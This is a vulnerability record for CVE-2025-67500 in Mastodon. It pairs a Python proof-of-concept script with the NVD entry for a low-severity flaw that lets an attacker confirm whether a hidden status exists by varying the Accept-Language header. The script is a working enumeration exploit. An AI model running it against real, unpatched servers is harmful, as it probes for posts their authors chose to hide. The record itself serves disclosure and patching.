CVE-2025-67500

import requests # CVE-2025-67500 PoC - Mastodon Status Existence Enumeration # This vulnerability allows attackers to check if a status exists # by sending requests with non-English Accept-Language headers TARGET_URL = "https://mastodon.example.com/api/v1/statuses/" STATUS_ID = "123456789" # Replace with target status ID def check_status_exists(status_id): """ Check if a status exists by comparing responses with different Accept-Language headers """ headers_english = { "Accept-Language": "en-US,en;q=0.9", "User-Agent": "Mozilla/5.0" } headers_non_english = { "Accept-Language": "fr-FR,fr;q=0.9", "User-Agent": "Mozilla/5.0" } try: # Send request with English Accept-Language resp_en = requests.get( f"{TARGET_URL}{status_id}", headers=headers_english, timeout=10 ) # Send request with non-English Accept-Language resp_non_en = requests.get( f"{TARGET_URL}{status_id}", headers=headers_non_english, timeout=10 ) # Compare responses if resp_en.status_code != resp_non_en.status_code: print(f"[+] Status {status_id} EXISTS (Response differs: EN={resp_en.status_code}, NON-EN={resp_non_en.status_code})") return True elif resp_en.status_code == 404 and resp_non_en.status_code == 404: print(f"[-] Status {status_id} does NOT exist") return False else: print(f"[?] Status {status_id} - Unable to determine (both returned {resp_en.status_code})") return None except requests.RequestException as e: print(f"[!] Request failed: {e}") return None if __name__ == "__main__": print("CVE-2025-67500 PoC - Mastodon Status Enumeration") print("=" * 50) check_status_exists(STATUS_ID)

{"cve": {"id": "CVE-2025-67500", "sourceIdentifier": "[email protected]", "published": "2025-12-10T00:16:11.270", "lastModified": "2025-12-19T19:29:53.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mastodon is a free, open-source social network server based on ActivityPub. Versions 4.2.27 and prior, 4.3.0-beta.1 through 4.3.14, 4.4.0-beta.1 through 4.4.9, 4.5.0-beta.1 through 4.5.2 have discrepancies in error handling which allow checking whether a given status exists by sending a request with a non-English Accept-Language header. Using this behavior, an attacker who knows the identifier of a particular status they are not allowed to see can confirm whether this status exists or not. This cannot be used to learn the contents of the status or any other property besides its existence. This issue is fixed in versions 4.2.28, 4.3.15, 4.4.10 and 4.5.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.2.28", "matchCriteriaId": "C9100527-3A10-4D09-A322-7487BB36102D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.3.0", "versionEndExcluding": "4.3.15", "matchCriteriaId": "53839555-56EC-43AE-B344-643F0F8326E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.10", "matchCriteriaId": "8F59D92C-1E2E-454F-91F8-4764E88D61E4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0", "versionEndExcluding": "4.5.3", "matchCriteriaId": "20E7A258-0D9F-40E6-ABD5-DB3C60FE95D8"}]}]}], "references": [{"url": "https://github.com/mastodon/mastodon/pull/37077/commits/9957d3218cb33fea6a44bb285e2ba4795a059e4f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mastodon/mastodon/security/advisories/GHSA-gwhw-gcjx-72v8", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}